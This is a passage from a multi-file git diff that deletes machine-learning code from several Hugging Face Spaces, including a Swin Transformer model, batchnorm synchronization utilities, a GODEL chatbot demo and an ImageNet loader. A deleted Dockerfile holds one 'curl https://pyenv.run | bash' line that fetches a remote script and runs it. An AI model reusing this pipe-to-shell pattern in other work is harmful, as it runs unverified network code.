= self.proj(x).flatten(2).transpose(1, 2) # B Ph*Pw C - if self.norm is not None: - x = self.norm(x) - return x - - def flops(self): - Ho, Wo = self.patches_resolution - flops = Ho * Wo * self.embed_dim * self.in_chans * (self.patch_size[0] * self.patch_size[1]) - if self.norm is not None: - flops += Ho * Wo * self.embed_dim - return flops - - -class SwinTransformer(nn.Module): - r""" Swin Transformer - A PyTorch impl of : `Swin Transformer: Hierarchical Vision Transformer using Shifted Windows` - - https://arxiv.org/pdf/2103.14030 - - Args: - img_size (int | tuple(int)): Input image size. Default 224 - patch_size (int | tuple(int)): Patch size. Default: 4 - in_chans (int): Number of input image channels. Default: 3 - num_classes (int): Number of classes for classification head. Default: 1000 - embed_dim (int): Patch embedding dimension. Default: 96 - depths (tuple(int)): Depth of each Swin Transformer layer. - num_heads (tuple(int)): Number of attention heads in different layers. - window_size (int): Window size. Default: 7 - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4 - qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. Default: None - drop_rate (float): Dropout rate. Default: 0 - attn_drop_rate (float): Attention dropout rate. Default: 0 - drop_path_rate (float): Stochastic depth rate. Default: 0.1 - norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm. - ape (bool): If True, add absolute position embedding to the patch embedding. Default: False - patch_norm (bool): If True, add normalization after patch embedding. Default: True - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False - """ - - def __init__(self, img_size=224, patch_size=4, in_chans=3, num_classes=1000, - embed_dim=96, depths=[2, 2, 6, 2], num_heads=[3, 6, 12, 24], - window_size=7, mlp_ratio=4., qkv_bias=True, qk_scale=None, - drop_rate=0., attn_drop_rate=0., drop_path_rate=0.1, - norm_layer=nn.LayerNorm, ape=False, patch_norm=True, - use_checkpoint=False, **kwargs): - super().__init__() - - self.num_classes = num_classes - self.num_layers = len(depths) - self.embed_dim = embed_dim - self.ape = ape - self.patch_norm = patch_norm - self.num_features = int(embed_dim * 2 ** (self.num_layers - 1)) - self.mlp_ratio = mlp_ratio - - # split image into non-overlapping patches - self.patch_embed = PatchEmbed( - img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim, - norm_layer=norm_layer if self.patch_norm else None) - num_patches = self.patch_embed.num_patches - patches_resolution = self.patch_embed.patches_resolution - self.patches_resolution = patches_resolution - - # absolute position embedding - if self.ape: - self.absolute_pos_embed = nn.Parameter(torch.zeros(1, num_patches, embed_dim)) - trunc_normal_(self.absolute_pos_embed, std=.02) - - self.pos_drop = nn.Dropout(p=drop_rate) - - # stochastic depth - dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] # stochastic depth decay rule - - # build layers - self.layers = nn.ModuleList() - for i_layer in range(self.num_layers): - layer = BasicLayer(dim=int(embed_dim * 2 ** i_layer), - input_resolution=(patches_resolution[0] // (2 ** i_layer), - patches_resolution[1] // (2 ** i_layer)), - depth=depths[i_layer], - num_heads=num_heads[i_layer], - window_size=window_size, - mlp_ratio=self.mlp_ratio, - qkv_bias=qkv_bias, qk_scale=qk_scale, - drop=drop_rate, attn_drop=attn_drop_rate, - drop_path=dpr[sum(depths[:i_layer]):sum(depths[:i_layer + 1])], - norm_layer=norm_layer, - downsample=PatchMerging if (i_layer < self.num_layers - 1) else None, - use_checkpoint=use_checkpoint) - self.layers.append(layer) - - self.norm = norm_layer(self.num_features) - self.avgpool = nn.AdaptiveAvgPool1d(1) - # self.head = nn.Linear(self.num_features, num_classes) if num_classes > 0 else nn.Identity() - - self.apply(self._init_weights) - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - trunc_normal_(m.weight, std=.02) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - @torch.jit.ignore - def no_weight_decay(self): - return {'absolute_pos_embed'} - - @torch.jit.ignore - def no_weight_decay_keywords(self): - return {'relative_position_bias_table'} - - def forward(self, x, idx_to_group_img=None, image_atts=None, **kwargs): - x = self.patch_embed(x) - if self.ape: - x = x + self.absolute_pos_embed - x = self.pos_drop(x) - - for layer in self.layers: - x = layer(x) - - x = self.norm(x) # B L C - - x_cls = self.avgpool(x.transpose(1, 2)) # B C 1 - - if idx_to_group_img is None: - return torch.cat([x_cls.transpose(1, 2), x], dim=1) - else: - x_bs = torch.gather(x, dim=0, index=idx_to_group_img.view(-1, 1, 1).expand(-1, x.shape[1], x.shape[2])) - weights = image_atts[:, 1:].unsqueeze(2) # B L 1 - x_bs_cls = torch.sum((weights * x_bs).transpose(1, 2), dim=-1, keepdim=True) # B C 1 - x_bs_cls = x_bs_cls / torch.sum(weights.transpose(1, 2), dim=-1, keepdim=True) # avgpool - - return torch.cat([x_bs_cls.transpose(1, 2), x_bs], dim=1), \ - torch.cat([x_cls.transpose(1, 2), x], dim=1) - - def flops(self): - flops = 0 - flops += self.patch_embed.flops() - for i, layer in enumerate(self.layers): - flops += layer.flops() - flops += self.num_features * self.patches_resolution[0] * self.patches_resolution[1] // (2 ** self.num_layers) - flops += self.num_features * self.num_classes - return flops - - -def interpolate_relative_pos_embed(rel_pos_bias, dst_num_pos, param_name=''): - # from: https://github.com/microsoft/unilm/blob/8a0a1c1f4e7326938ea7580a00d56d7f17d65612/beit/run_class_finetuning.py#L348 - - # rel_pos_bias: relative_position_bias_table - src_num_pos, num_attn_heads = rel_pos_bias.size() - - num_extra_tokens = 0 - src_size = int((src_num_pos - num_extra_tokens) ** 0.5) - dst_size = int((dst_num_pos - num_extra_tokens) ** 0.5) - if src_size != dst_size: - print("Position interpolate %s from %dx%d to %dx%d" % (param_name, src_size, src_size, dst_size, dst_size)) - - # extra_tokens = rel_pos_bias[-num_extra_tokens:, :] - # rel_pos_bias = rel_pos_bias[:-num_extra_tokens, :] - - def geometric_progression(a, r, n): - return a * (1.0 - r ** n) / (1.0 - r) - - left, right = 1.01, 1.5 - while right - left > 1e-6: - q = (left + right) / 2.0 - gp = geometric_progression(1, q, src_size // 2) - if gp > dst_size // 2: - right = q - else: - left = q - - # if q > 1.090307: - # q = 1.090307 - - dis = [] - cur = 1 - for i in range(src_size // 2): - dis.append(cur) - cur += q ** (i + 1) - - r_ids = [-_ for _ in reversed(dis)] - - x = r_ids + [0] + dis - y = r_ids + [0] + dis - - t = dst_size // 2.0 - dx = np.arange(-t, t + 0.1, 1.0) - dy = np.arange(-t, t + 0.1, 1.0) - - # print("Original positions = %s" % str(x)) - # print("Target positions = %s" % str(dx)) - - all_rel_pos_bias = [] - - for i in range(num_attn_heads): - z = rel_pos_bias[:, i].view(src_size, src_size).float().numpy() - f = interpolate.interp2d(x, y, z, kind='cubic') - all_rel_pos_bias.append( - torch.Tensor(f(dx, dy)).contiguous().view(-1, 1).to(rel_pos_bias.device)) - - rel_pos_bias = torch.cat(all_rel_pos_bias, dim=-1) - - return rel_pos_bias \ No newline at end of file diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/models/ade20k/segm_lib/nn/parallel/__init__.py b/spaces/OpenGVLab/InternGPT/third-party/lama/bin/models/ade20k/segm_lib/nn/parallel/__init__.py deleted file mode 100644 index 9b52f49cc0755562218a460483cbf02514ddd773..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/models/ade20k/segm_lib/nn/parallel/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .data_parallel import UserScatteredDataParallel, user_scattered_collate, async_copy_to diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/models/ade20k/segm_lib/nn/modules/comm.py b/spaces/OpenGVLab/InternGPT/third-party/lama/models/ade20k/segm_lib/nn/modules/comm.py deleted file mode 100644 index b64bf6ba3b3e7abbab375c6dd4a87d8239e62138..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/models/ade20k/segm_lib/nn/modules/comm.py +++ /dev/null @@ -1,131 +0,0 @@ -# -*- coding: utf-8 -*- -# File : comm.py -# Author : Jiayuan Mao -# Email : maojiayuan@gmail.com -# Date : 27/01/2018 -# -# This file is part of Synchronized-BatchNorm-PyTorch. -# https://github.com/vacancy/Synchronized-BatchNorm-PyTorch -# Distributed under MIT License. - -import queue -import collections -import threading - -__all__ = ['FutureResult', 'SlavePipe', 'SyncMaster'] - - -class FutureResult(object): - """A thread-safe future implementation. Used only as one-to-one pipe.""" - - def __init__(self): - self._result = None - self._lock = threading.Lock() - self._cond = threading.Condition(self._lock) - - def put(self, result): - with self._lock: - assert self._result is None, 'Previous result has\'t been fetched.' - self._result = result - self._cond.notify() - - def get(self): - with self._lock: - if self._result is None: - self._cond.wait() - - res = self._result - self._result = None - return res - - -_MasterRegistry = collections.namedtuple('MasterRegistry', ['result']) -_SlavePipeBase = collections.namedtuple('_SlavePipeBase', ['identifier', 'queue', 'result']) - - -class SlavePipe(_SlavePipeBase): - """Pipe for master-slave communication.""" - - def run_slave(self, msg): - self.queue.put((self.identifier, msg)) - ret = self.result.get() - self.queue.put(True) - return ret - - -class SyncMaster(object): - """An abstract `SyncMaster` object. - - - During the replication, as the data parallel will trigger an callback of each module, all slave devices should - call `register(id)` and obtain an `SlavePipe` to communicate with the master. - - During the forward pass, master device invokes `run_master`, all messages from slave devices will be collected, - and passed to a registered callback. - - After receiving the messages, the master device should gather the information and determine to message passed - back to each slave devices. - """ - - def __init__(self, master_callback): - """ - - Args: - master_callback: a callback to be invoked after having collected messages from slave devices. - """ - self._master_callback = master_callback - self._queue = queue.Queue() - self._registry = collections.OrderedDict() - self._activated = False - - def register_slave(self, identifier): - """ - Register an slave device. - - Args: - identifier: an identifier, usually is the device id. - - Returns: a `SlavePipe` object which can be used to communicate with the master device. - - """ - if self._activated: - assert self._queue.empty(), 'Queue is not clean before next initialization.' - self._activated = False - self._registry.clear() - future = FutureResult() - self._registry[identifier] = _MasterRegistry(future) - return SlavePipe(identifier, self._queue, future) - - def run_master(self, master_msg): - """ - Main entry for the master device in each forward pass. - The messages were first collected from each devices (including the master device), and then - an callback will be invoked to compute the message to be sent back to each devices - (including the master device). - - Args: - master_msg: the message that the master want to send to itself. This will be placed as the first - message when calling `master_callback`. For detailed usage, see `_SynchronizedBatchNorm` for an example. - - Returns: the message to be sent back to the master device. - - """ - self._activated = True - - intermediates = [(0, master_msg)] - for i in range(self.nr_slaves): - intermediates.append(self._queue.get()) - - results = self._master_callback(intermediates) - assert results[0][0] == 0, 'The first result should belongs to the master.' - - for i, res in results: - if i == 0: - continue - self._registry[i].result.put(res) - - for i in range(self.nr_slaves): - assert self._queue.get() is True - - return results[0][1] - - @property - def nr_slaves(self): - return len(self._registry) diff --git a/spaces/PAIR/PAIR-Diffusion/Dockerfile b/spaces/PAIR/PAIR-Diffusion/Dockerfile deleted file mode 100644 index 64a6eca483c57db8d8321199018d83eaad58dac3..0000000000000000000000000000000000000000 --- a/spaces/PAIR/PAIR-Diffusion/Dockerfile +++ /dev/null @@ -1,68 +0,0 @@ -FROM nvidia/cuda:11.3.1-cudnn8-devel-ubuntu18.04 -CMD nvidia-smi - -ENV DEBIAN_FRONTEND noninteractive -RUN apt-get update && apt-get install -y \ - git \ - make build-essential libssl-dev zlib1g-dev \ - libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm \ - libncursesw5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev \ - ffmpeg libsm6 libxext6 cmake libgl1-mesa-glx \ - && rm -rf /var/lib/apt/lists/* - -RUN useradd -ms /bin/bash user -USER user - -ENV HOME=/home/user \ - PATH=/home/user/.local/bin:$PATH - -RUN curl https://pyenv.run | bash -ENV PATH=$HOME/.pyenv/shims:$HOME/.pyenv/bin:$PATH -RUN pyenv install 3.8.15 && \ - pyenv global 3.8.15 && \ - pyenv rehash && \ - pip install --no-cache-dir --upgrade pip setuptools wheel - -ENV WORKDIR=/code -WORKDIR $WORKDIR -RUN chown -R user:user $WORKDIR -RUN chmod -R 777 $WORKDIR - -COPY requirements.txt $WORKDIR/requirements.txt -RUN pip install --no-cache-dir --upgrade -r $WORKDIR/requirements.txt -RUN pip install ninja - -COPY . . - -ARG TORCH_CUDA_ARCH_LIST=7.5+PTX - -USER root -RUN chown -R user:user $HOME -RUN chmod -R 777 $HOME -RUN chown -R user:user $WORKDIR -RUN chmod -R 777 $WORKDIR - -USER user -RUN ln -s $WORKDIR/annotator/OneFormer/oneformer/modeling/pixel_decoder/ops $WORKDIR/ && ls -RUN cd ops/ && FORCE_CUDA=1 python setup.py build --build-base=$WORKDIR/ install --user && cd .. -RUN sh deform_setup.sh - -USER user -RUN sh deform_setup.sh - -USER user - -ENV PYTHONPATH=${HOME}/app \ - PYTHONUNBUFFERED=1 \ - GRADIO_ALLOW_FLAGGING=never \ - GRADIO_NUM_PORTS=1 \ - GRADIO_SERVER_NAME=0.0.0.0 \ - GRADIO_THEME=huggingface \ - SYSTEM=spaces - -RUN --mount=type=secret,id=ACCESS_TOKEN,mode=0444,required=true - - -EXPOSE 7860 - -ENTRYPOINT ["python", "app.py"] \ No newline at end of file diff --git a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/cnn/bricks/conv_ws.py b/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/cnn/bricks/conv_ws.py deleted file mode 100644 index a3941e27874993418b3b5708d5a7485f175ff9c8..0000000000000000000000000000000000000000 --- a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/cnn/bricks/conv_ws.py +++ /dev/null @@ -1,148 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import torch -import torch.nn as nn -import torch.nn.functional as F - -from .registry import CONV_LAYERS - - -def conv_ws_2d(input, - weight, - bias=None, - stride=1, - padding=0, - dilation=1, - groups=1, - eps=1e-5): - c_in = weight.size(0) - weight_flat = weight.view(c_in, -1) - mean = weight_flat.mean(dim=1, keepdim=True).view(c_in, 1, 1, 1) - std = weight_flat.std(dim=1, keepdim=True).view(c_in, 1, 1, 1) - weight = (weight - mean) / (std + eps) - return F.conv2d(input, weight, bias, stride, padding, dilation, groups) - - -@CONV_LAYERS.register_module('ConvWS') -class ConvWS2d(nn.Conv2d): - - def __init__(self, - in_channels, - out_channels, - kernel_size, - stride=1, - padding=0, - dilation=1, - groups=1, - bias=True, - eps=1e-5): - super(ConvWS2d, self).__init__( - in_channels, - out_channels, - kernel_size, - stride=stride, - padding=padding, - dilation=dilation, - groups=groups, - bias=bias) - self.eps = eps - - def forward(self, x): - return conv_ws_2d(x, self.weight, self.bias, self.stride, self.padding, - self.dilation, self.groups, self.eps) - - -@CONV_LAYERS.register_module(name='ConvAWS') -class ConvAWS2d(nn.Conv2d): - """AWS (Adaptive Weight Standardization) - - This is a variant of Weight Standardization - (https://arxiv.org/pdf/1903.10520.pdf) - It is used in DetectoRS to avoid NaN - (https://arxiv.org/pdf/2006.02334.pdf) - - Args: - in_channels (int): Number of channels in the input image - out_channels (int): Number of channels produced by the convolution - kernel_size (int or tuple): Size of the conv kernel - stride (int or tuple, optional): Stride of the convolution. Default: 1 - padding (int or tuple, optional): Zero-padding added to both sides of - the input. Default: 0 - dilation (int or tuple, optional): Spacing between kernel elements. - Default: 1 - groups (int, optional): Number of blocked connections from input - channels to output channels. Default: 1 - bias (bool, optional): If set True, adds a learnable bias to the - output. Default: True - """ - - def __init__(self, - in_channels, - out_channels, - kernel_size, - stride=1, - padding=0, - dilation=1, - groups=1, - bias=True): - super().__init__( - in_channels, - out_channels, - kernel_size, - stride=stride, - padding=padding, - dilation=dilation, - groups=groups, - bias=bias) - self.register_buffer('weight_gamma', - torch.ones(self.out_channels, 1, 1, 1)) - self.register_buffer('weight_beta', - torch.zeros(self.out_channels, 1, 1, 1)) - - def _get_weight(self, weight): - weight_flat = weight.view(weight.size(0), -1) - mean = weight_flat.mean(dim=1).view(-1, 1, 1, 1) - std = torch.sqrt(weight_flat.var(dim=1) + 1e-5).view(-1, 1, 1, 1) - weight = (weight - mean) / std - weight = self.weight_gamma * weight + self.weight_beta - return weight - - def forward(self, x): - weight = self._get_weight(self.weight) - return F.conv2d(x, weight, self.bias, self.stride, self.padding, - self.dilation, self.groups) - - def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict, - missing_keys, unexpected_keys, error_msgs): - """Override default load function. - - AWS overrides the function _load_from_state_dict to recover - weight_gamma and weight_beta if they are missing. If weight_gamma and - weight_beta are found in the checkpoint, this function will return - after super()._load_from_state_dict. Otherwise, it will compute the - mean and std of the pretrained weights and store them in weight_beta - and weight_gamma. - """ - - self.weight_gamma.data.fill_(-1) - local_missing_keys = [] - super()._load_from_state_dict(state_dict, prefix, local_metadata, - strict, local_missing_keys, - unexpected_keys, error_msgs) - if self.weight_gamma.data.mean() > 0: - for k in local_missing_keys: - missing_keys.append(k) - return - weight = self.weight.data - weight_flat = weight.view(weight.size(0), -1) - mean = weight_flat.mean(dim=1).view(-1, 1, 1, 1) - std = torch.sqrt(weight_flat.var(dim=1) + 1e-5).view(-1, 1, 1, 1) - self.weight_beta.data.copy_(mean) - self.weight_gamma.data.copy_(std) - missing_gamma_beta = [ - k for k in local_missing_keys - if k.endswith('weight_gamma') or k.endswith('weight_beta') - ] - for k in missing_gamma_beta: - local_missing_keys.remove(k) - for k in local_missing_keys: - missing_keys.append(k) diff --git a/spaces/PSLD/PSLD/stable-diffusion/run/inverse_gb_ldm.sh b/spaces/PSLD/PSLD/stable-diffusion/run/inverse_gb_ldm.sh deleted file mode 100644 index deba2da6d9d1eff398d87639459abd9add1b436c..0000000000000000000000000000000000000000 --- a/spaces/PSLD/PSLD/stable-diffusion/run/inverse_gb_ldm.sh +++ /dev/null @@ -1,14 +0,0 @@ -export CUDA_VISIBLE_DEVICES='1' -python scripts/inverse.py \ - --file_id='00014.png' \ - --task_config='configs/gaussian_deblur_config.yaml' \ - --inpainting=0 \ - --general_inverse=1 \ - --gamma=1e-1 \ - --omega=1e-1 \ - --ffhq256 \ - --W=256 \ - --H=256 \ - --C=3 \ - --f=4 \ - --outdir='outputs/psld-ldm-samples-gb' \ No newline at end of file diff --git a/spaces/PeepDaSlan9/AutoGPT/autogpt/permanent_memory/__init__.py b/spaces/PeepDaSlan9/AutoGPT/autogpt/permanent_memory/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/PickleYard/stable-diffusion-webui-cpu/README.md b/spaces/PickleYard/stable-diffusion-webui-cpu/README.md deleted file mode 100644 index 404430459e1b516be671298c7de21de7a039e30d..0000000000000000000000000000000000000000 --- a/spaces/PickleYard/stable-diffusion-webui-cpu/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Stable Diffusion Webui on Cpu -emoji: 🏃 -colorFrom: pink -colorTo: purple -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false -python_version: 3.10.6 -duplicated_from: IoMa/stable-diffusion-webui-cpu-the-best ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/__init__.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/__init__.py deleted file mode 100644 index 210a2989138380559f23045b568d0fbbeb918c03..0000000000000000000000000000000000000000 --- a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/__init__.py +++ /dev/null @@ -1,15 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -# flake8: noqa -from .arraymisc import * -from .fileio import * -from .image import * -from .utils import * -from .version import * -from .video import * -from .visualization import * - -# The following modules are not imported to this level, so mmcv may be used -# without PyTorch. -# - runner -# - parallel -# - op diff --git a/spaces/Polyhronis/codellama-CodeLlama-34b-Instruct-hf/app.py b/spaces/Polyhronis/codellama-CodeLlama-34b-Instruct-hf/app.py deleted file mode 100644 index 45be891f295ef47f7654445e26536527e0f82446..0000000000000000000000000000000000000000 --- a/spaces/Polyhronis/codellama-CodeLlama-34b-Instruct-hf/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/codellama/CodeLlama-34b-Instruct-hf").launch() \ No newline at end of file diff --git a/spaces/PrajwalS/GODEL-Demo-nxt/app.py b/spaces/PrajwalS/GODEL-Demo-nxt/app.py deleted file mode 100644 index c9d1ac92af2fd0ce499038b47029af55d85d0793..0000000000000000000000000000000000000000 --- a/spaces/PrajwalS/GODEL-Demo-nxt/app.py +++ /dev/null @@ -1,135 +0,0 @@ -import gradio as gr - -from transformers import ( - AutoTokenizer, - AutoModel, - AutoModelForSeq2SeqLM, - AutoModelForCausalLM -) - -tokenizer = AutoTokenizer.from_pretrained("microsoft/GODEL-v1_1-base-seq2seq") -model = AutoModelForSeq2SeqLM.from_pretrained("microsoft/GODEL-v1_1-base-seq2seq") - -preset_examples = [ - ('Instruction: given a dialog context, you need to response empathically.', - '', 'Does money buy happiness?', 'Chitchat'), - ('Instruction: given a dialog context, you need to response empathically.', - '', 'What is the goal of life?', 'Chitchat'), - ('Instruction: given a dialog context, you need to response empathically.', - '', 'What is the most interesing thing about our universe?', 'Chitchat'), - ('Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.', - '''Scooby-Doo is the eponymous character and protagonist of the animated television franchise of the same name, created in 1969 by the American animation company Hanna-Barbera.[1] He is a male Great Dane and lifelong companion of amateur detective Shaggy Rogers, with whom he shares many personality traits. He features a mix of both canine and human behaviors (reminiscent of other talking animals in Hanna-Barbera's series), and is treated by his friends more or less as an equal. Scooby often speaks in a rhotacized way, substituting the first letters of many words with the letter 'r'. His catchphrase is "Scooby-Dooby-Doo!" - ''', - 'What kind of animal is scooby from scooby doo?', 'Conversational Question Answering' - ), - ('Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.', - '''Subject: faa demos - Dan: PM Team, Attached are some general ideas and issues around developing new demos for our new target markets. Please review and provide feedback. Also, please provide links where we can learn more about various FAA applications. Thanx, Dan. - Alex: Dan, Thanks for putting the high level descriptions together. My questions are: *Is it practical to do an EAI demo given the inherent complexity of application integration? ... * Should we delay looking at Outlook for now?... *What do you think that timelines are developing these demos? ... Alex - Dan: Alex, Thanks for the feedback, please see my comments below: - ''', - 'what does Dan ask PM team to do?', 'Conversational Question Answering' - ), - ('Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.', - '''Carlos Alcaraz, at just 19, completed an improbable journey on Sunday in Flushing Meadows as he defeated No. 5 Casper Ruud to win the 2022 US Open. Alcaraz came away with a 6-4, 2-6, 7-6, 6-2 win over Ruud to win his first career Grand Slam title. - - In doing so, Alcaraz became the second-youngest player to win a men's US Open title at 19 years, 129 days old, only trailing Pete Sampras. In addition, Alcaraz is the seventh youngest male or female to ever win a Grand Slam tournament. With the Grand Slam victory, Alcaraz becomes the No. 1 ranked player in the world. Additionally, the 19-year-old budding star is also the youngest player to ever be ranked as the world's No. 1 player. - ''', - 'who won the 2022 US Open? EOS Carlos Alcaraz EOS how old?', 'Conversational Question Answering' - ), - ( - 'Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.', - '''Over-the-counter medications such as ibuprofen (Advil, Motrin IB, others), acetaminophen (Tylenol, others) and aspirin. - ''', - 'I have a headache, what should I do?', "Grounded Response Generation" - ), - ( - 'Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.', - '''The best Stardew Valley mods PCGamesN_0 / About SMAPI - ''', - 'My favorite game is stardew valley. stardew valley is very fun.', "Grounded Response Generation" - ), - ( - 'Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.', - '''Wong Kar-wai BBS (born 17 July 1958) is a Hong Kong film director, screenwriter, and producer. His films are characterised by nonlinear narratives, atmospheric music, and vivid cinematography involving bold, saturated colours. A pivotal figure of Hong Kong cinema, Wong is considered a contemporary auteur, and ranks third on Sight & Sound's 2002 poll of the greatest filmmakers of modern times.[note 1] His films frequently appear on best-of lists domestically and internationally. - ''', - 'My favorite director is wrong kar wai. i think in modern cinema there is no other director is is making the medium as cool', "Grounded Response Generation" - ) -] - - -def generate(instruction, knowledge, dialog, top_p, min_length, max_length): - if knowledge != '': - knowledge = '[KNOWLEDGE] ' + knowledge - dialog = ' EOS '.join(dialog) - query = f"{instruction} [CONTEXT] {dialog} {knowledge}" - - input_ids = tokenizer(f"{query}", return_tensors="pt").input_ids - outputs = model.generate(input_ids, min_length=int( - min_length), max_length=int(max_length), top_p=top_p, do_sample=True) - output = tokenizer.decode(outputs[0], skip_special_tokens=True) - print(query) - print(output) - return output - - -def api_call_generation(instruction, knowledge, query, top_p, min_length, max_length): - - dialog = [ - query - ] - response = generate(instruction, knowledge, dialog, - top_p, min_length, max_length) - - return response - - -def change_example(choice): - choice_idx = int(choice.split()[-1]) - 1 - instruction, knowledge, query, instruction_type = preset_examples[choice_idx] - return [gr.update(lines=1, visible=True, value=instruction), gr.update(visible=True, value=knowledge), gr.update(lines=1, visible=True, value=query), gr.update(visible=True, value=instruction_type)] - -def change_textbox(choice): - if choice == "Chitchat": - return gr.update(lines=1, visible=True, value="Instruction: given a dialog context, you need to response empathically.") - elif choice == "Grounded Response Generation": - return gr.update(lines=1, visible=True, value="Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.") - else: - return gr.update(lines=1, visible=True, value="Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.") - - -with gr.Blocks() as demo: - gr.Markdown("# GODEL: Large-Scale Pre-Training for Goal-Directed Dialog") - gr.Markdown('''GODEL is a large open-source pre-trained language model for dialog. In contrast with its predecessor DialoGPT, GODEL leverages a new phase of grounded pretraining designed to better support finetuning phases that require information external to the current conversation (e.g., a database or document) to produce good responses. More information about this work can be found in the paper [GODEL: Large-Scale Pre-training for Goal-Directed Dialog.](https://www.microsoft.com/en-us/research/project/godel/) - ->Looking for a large open-source pre-trained language model for dialog? Look no further than GODEL! GODEL leverages a new phase of grounded pretraining designed to better support finetuning phases that require information external to the current conversation (e.g., a database or document) to produce good responses. So if you're looking for a language model that can help you produce better responses in a variety of situations, GODEL is the right choice for you!

------ a copy from GPT-3

''') - - dropdown = gr.Dropdown( - [f"Example {i+1}" for i in range(9)], label='Examples') - - radio = gr.Radio( - ["Conversational Question Answering", "Chitchat", "Grounded Response Generation"], label="Instruction Type", value='Conversational Question Answering' - ) - instruction = gr.Textbox(lines=1, interactive=True, label="Instruction", - value="Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.") - radio.change(fn=change_textbox, inputs=radio, outputs=instruction) - knowledge = gr.Textbox(lines=6, label="Knowledge") - query = gr.Textbox(lines=1, label="User Query") - - dropdown.change(change_example, dropdown, [instruction, knowledge, query, radio]) - - with gr.Row(): - with gr.Column(scale=1): - response = gr.Textbox(label="Response", lines=2) - - with gr.Column(scale=1): - top_p = gr.Slider(0, 1, value=0.9, label='top_p') - min_length = gr.Number(8, label='min_length') - max_length = gr.Number( - 64, label='max_length (should be larger than min_length)') - - greet_btn = gr.Button("Generate") - greet_btn.click(fn=api_call_generation, inputs=[ - instruction, knowledge, query, top_p, min_length, max_length], outputs=response) - -demo.launch() diff --git a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/taming/data/imagenet.py b/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/taming/data/imagenet.py deleted file mode 100644 index 9a02ec44ba4af9e993f58c91fa43482a4ecbe54c..0000000000000000000000000000000000000000 --- a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/taming/data/imagenet.py +++ /dev/null @@ -1,558 +0,0 @@ -import os, tarfile, glob, shutil -import yaml -import numpy as np -from tqdm import tqdm -from PIL import Image -import albumentations -from omegaconf import OmegaConf -from torch.utils.data import Dataset - -from taming.data.base import ImagePaths -from taming.util import download, retrieve -import taming.data.utils as bdu - - -def give_synsets_from_indices(indices, path_to_yaml="data/imagenet_idx_to_synset.yaml"): - synsets = [] - with open(path_to_yaml) as f: - di2s = yaml.load(f) - for idx in indices: - synsets.append(str(di2s[idx])) - print("Using {} different synsets for construction of Restriced Imagenet.".format(len(synsets))) - return synsets - - -def str_to_indices(string): - """Expects a string in the format '32-123, 256, 280-321'""" - assert not string.endswith(","), "provided string '{}' ends with a comma, pls remove it".format(string) - subs = string.split(",") - indices = [] - for sub in subs: - subsubs = sub.split("-") - assert len(subsubs) > 0 - if len(subsubs) == 1: - indices.append(int(subsubs[0])) - else: - rang = [j for j in range(int(subsubs[0]), int(subsubs[1]))] - indices.extend(rang) - return sorted(indices) - - -class ImageNetBase(Dataset): - def __init__(self, config=None): - self.config = config or OmegaConf.create() - if not type(self.config)==dict: - self.config = OmegaConf.to_container(self.config) - self._prepare() - self._prepare_synset_to_human() - self._prepare_idx_to_synset() - self._load() - - def __len__(self): - return len(self.data) - - def __getitem__(self, i): - return self.data[i] - - def _prepare(self): - raise NotImplementedError() - - def _filter_relpaths(self, relpaths): - ignore = set([ - "n06596364_9591.JPEG", - ]) - relpaths = [rpath for rpath in relpaths if not rpath.split("/")[-1] in ignore] - if "sub_indices" in self.config: - indices = str_to_indices(self.config["sub_indices"]) - synsets = give_synsets_from_indices(indices, path_to_yaml=self.idx2syn) # returns a list of strings - files = [] - for rpath in relpaths: - syn = rpath.split("/")[0] - if syn in synsets: - files.append(rpath) - return files - else: - return relpaths - - def _prepare_synset_to_human(self): - SIZE = 2655750 - URL = "https://heibox.uni-heidelberg.de/f/9f28e956cd304264bb82/?dl=1" - self.human_dict = os.path.join(self.root, "synset_human.txt") - if (not os.path.exists(self.human_dict) or - not os.path.getsize(self.human_dict)==SIZE): - download(URL, self.human_dict) - - def _prepare_idx_to_synset(self): - URL = 